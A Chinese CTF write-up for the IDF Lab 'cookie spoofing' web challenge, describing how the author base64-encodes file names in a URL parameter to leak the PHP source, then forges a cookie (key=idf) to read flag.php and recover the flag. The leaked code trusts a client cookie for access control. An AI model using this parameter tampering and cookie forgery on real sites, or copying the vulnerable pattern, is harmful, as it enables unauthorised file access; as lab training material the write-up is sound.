IDF實驗室-COOKIE欺騙
COOKIE欺騙php
http://ctf.idf.cn/game/web/40/index.php?line=&file=ZmxhZy50eHQ
html
cd67918e02086c10de8202a75ca31c256636bef519b576bcbe6d4b87f1d60bc41fdb0a8cf7ed032908c7e5ff2d9cc21d21b4be633a7861ad062859da7f696b9a9a8d1ab354d8a52c7051cad32b2494ce102e15aea3edba7d1679b5c888e67c7d3182cccaa9ab538f0613d47e3aa3e15f22979bef8d83ad0df8234504b0337d36d17b8489a1a3905df5d0b3c17f97dfd778d03b05324988e37cd8b18dc13ffb2ede3d0f5c53a0a1e9a4a75e2d3bf9f6d7e0c3b1bbaba54e5304f9721b7ca9c7fb3e0cc7393ac9789a667335ea0c55dce3b82006597735d348574ee8ff4a202406a9699d8e3a7e7da6b5fc7edc16fe32e5b4d5e49342ca87aeeca2f614be0698076e09101342d8687ca994de5e9b6a5d4b98e047dd31e30769df479123e9e98bda213390e34f7a42f92722c7d0d3d1ea9786e288efda65e00339f127d81161c831bff759ad9785f55bf5d0b3c17f97dfd78c67cb55bcabbd32285eb7340a17a87729ba26248ef1bc1d8a393cd8bb8f0d494a5073b70239cf20756099ebf676c4ba08d212860644eda73a63ffc8d4ffd6d730105ea1189ef88e97c44cf8b19128c5fefe3b4882ecebeb84bbdfebe8de635fa4f2a3698c024c275868256336d2ab59ce22477994ab18053e82a830f969690672fc8c3f968241f8e94ff3291fb9c3033d30f8ebff0f84214c3fb082a56757c7fbd0c12ea8cce5fcde6860c974544df8e1eb9fed85709c1df33c588a71199b144a9371868d42cea191989c31277ac3bb29ba26248ef1bc1d285eb7340a17a877ad178cbb5c86d825285eb7340a17a877d49c3c3e94ff810c7c78b8a371aeab8cef814c7247195262b34193f7235f2aa27f5c585c5b1ef9e677b1d8ae18284ba7fbc547c9d9ec255714074dee7ab68146f50595f492334506d92f86ac2f1f20fa1550182c9cf742db884993fc35bf61a7b0e3a40ed17527ffd26597de8f153c2cc90fda7b50259331c93ef7f2556995ccd7805a2675e259340bbf20812b5221a4fd26fa35b0372864fb40dcf9b286212a531d1e499e201f96ac52959521e85026feceb899c57e5e90f901634f6cac4e828878aa55b4bccc5a07aa1713be45dc0cdd3afbdb497838ec704dbee71f93a97310e28da80287333cb696561d5e1e6b9bb4d5eab6425f98bfc2167478dc9ae86e517d9d79a1945db5830e3e8be7ea494da46c968066044f39c6d593cb7002f3ccf82af8532ff3c34ce66215742ef8e3152866c60892d7909d3d4b1d93685da336356b156d62e5b604e6854414c8f110b1c65ff60899aac1501d19049f7ee2b4fd06e53b7df69c50c027420d2e9f6c9accc33d35c25f8c72463a57d558d84ffd3987122a71dc7399dc03d897f237ca7a93346e2f3d4d131d21e9e51e5624d4c304dae44068e581c73642bd269fcd79de98df4500ea28e5a8b82c3c4d83ba859890520404086900d5a8d76ae3656a253456b0df0a520e9d5d5cbbf474b5595250455d574a7018f99ec35e67ecbbd4c206f27d04c02b210636bcb5f8c74b1279234e24e52e100d4b5ad2044d7e613a7a1ca05e54c94082561413eec32f3ed72a8343704ca5c76ccdef24575a270d7baa51f36fc8963827eb6d1d4bb5202bb145eb3a5dd43133b4720fb7d3e6eeec25aeef31daa7900ab547c9a0c6d593cb7002f3cc9c862254d81e6cdbec1cd9b59418124433d46349846cc60c3b5e7f3c17e891718df7e950c8e378ba1f032c9fe54b9f5a6d09d837b221189e6362b8d887b677c0275622e0a0c30d5c44bfe0f2d3bd44070f889557656ee3d08acdeab92b7c73ab863938921b77bd7c5259121d67e9a932b01c9468b0101f8d9c5457b5e957fc61c2251022c3a4993826e4c66d3ab402a5080aaa164001260eded427397d59b075aad4334fa9990974ab7b3f35d043c910f633bce7041db6baddb6f4f007d0bbbadb3fe70c982c721451bf6b09d28ee56d32f9ea9e831fb0465bb865654be208f333b4ee348e67ddf19698ef61dc49ce620192f217d66988eb68c4676bc1159ae090e012d100978f309d5d084f19a955c3c42eb9e98e8a6361545c16c2185de33a5f9c744c9af53bc49da8c06d691f7be7eed71fb6982c57efb4226a9b2063f1550ef27ffc42c48afb6e4fd46a3c9b78e29292230a930ec14c3ed16ac5fd0b4d37a1de796c1e1a9e719896cddd61bd07d910951d89de39aae7d01d2fedf43a0a182de9a114ba343eb94795ec707a4d77556845e9eed0250a8aa31b3270142f643acc08b15bf0bf60d7fec991edc259048ca9353aef7db8544640b3c5594106f6a622e0d27b5e99d2addd2b81b92af2841534131b5b635847f04b7f70ef2043a22dfa99edb1f11bd574bc2981b913a69bc6b3a3a157579a2a80f5a00ef7b2def33455af8c17e92f96bdbeb49444064511700bed3fad8d30d236ea3390839ac9d996064f0ccfb74bb295e71c0bb15f590a199bf664f0eec762f7df913ca3f80b99acbf3a7ec7b6e3418630d418464f5bb1bd60c53208eeb8631f87d676bc04b4ffb1bca8c58c5c138e0d710933ba59352bd05afae401530fa50606564ae340f601b7dbb0ae7c4bc571eebf0aaf02db6dab7d57f734f77ae2cd4e209da3191d668105b93837d52be0ec153944dc584b5887d495f39d4142e58e6c289994f2c8c8f7e3e33aa8271a578a7a2a0abde4c251fff6c0ce6f1cb326a63f5db17d5c644ad8caba655498e24a0b1d5ae5f9012fc7ab4d0f889557656ee3d0750f3014ccd4e170c0f3782667755482a5089c6afb80efa038a21f1c93a9ed3ccecf776eae0651807d111e65272a32d4204b753cdad39fa3d9af3dca02da129a6da33a09285f705d8e14be8a39862db48810c6ee0a9164bb31237e158504de97b1b6f191bc500f1649d70edb0d89786f756099ebf676c4ba4dfac779dcf65c1ae648463b16569eea7218185dd3207f9bc1cb40a67e8c646c608a63763354dde026d4d86f759ad9528a35468448f76e1fedec68731bd5c1279b1469b144d9b651083c525a65049e40f7ac5211f10d40742580aef69f12d225e9387912f1eb9a2987ff0b3c4ca6009a
打開後是一串字符。。。web
地址給了2個參數 line 和file 。url參數傳遞通常用base64編碼shell
ZmxhZy50eHQ
丟到度度。獲得cookie
flag.txt
看大牛有猜想index.php的。based64走下:session
aW5kZXgucGhw
參數修改下,line從0日後試下結果:編碼
error_reporting(0);
$file=base64_decode(isset($_GET['file'])?$_GET['file']:"");
$line=isset($_GET['line'])?intval($_GET['line']):0;
if($file=='') header("location:index.php?line=&file=ZmxhZy50eHQ");
$file_list = array(
'0' =>'flag.txt',
'1' =>'index.php',
);
if(isset($_COOKIE['key']) && $_COOKIE['key']=='idf'){
$file_list[2]='flag.php';
}
if(in_array($file, $file_list)){
$fa = file($file);
echo $fa[$line];
}
?>
經過分析,當cookie中包含’key=idf’時能夠訪問’flag.php’文件。url
flag.php轉based64:ZmxhZy5waHA=spa
cookie經過firbug新增,session規則,以key爲名,idf爲值。3d
最後在網頁的源代碼中終於看到結果。
<?php $flag='wctf{idf_c00kie}'; ?>
感謝VEN提示,,,,汗,已經很晚了。
相關文章
- 1. BUGKU-cookie欺騙
- 2. bugku--cookie欺騙
- 3. DNS欺騙實驗
- 4. arp欺騙實驗
- 5. 實驗三 :欺騙
- 6. Cookie 欺騙——漏洞
- 7. 實驗七 網絡欺騙
- 8. ETTERCAP之ARP欺騙實驗
- 9. Cisco——DHCP欺騙小實驗
- 10. [c#]記一次實驗室局域網的ARP欺騙
- 更多相關文章...
- • PHP Cookie - PHP教程
- • XML 驗證 - XML 教程
- • ☆基於Java Instrument的Agent實現
- • Docker容器實戰(一) - 封神Server端技術
相關標籤/搜索
每日一句
-
每一个你不满意的现在,都有一个你没有努力的曾经。
歡迎關注本站公眾號,獲取更多信息
相關文章
- 1. BUGKU-cookie欺騙
- 2. bugku--cookie欺騙
- 3. DNS欺騙實驗
- 4. arp欺騙實驗
- 5. 實驗三 :欺騙
- 6. Cookie 欺騙——漏洞
- 7. 實驗七 網絡欺騙
- 8. ETTERCAP之ARP欺騙實驗
- 9. Cisco——DHCP欺騙小實驗
- 10. [c#]記一次實驗室局域網的ARP欺騙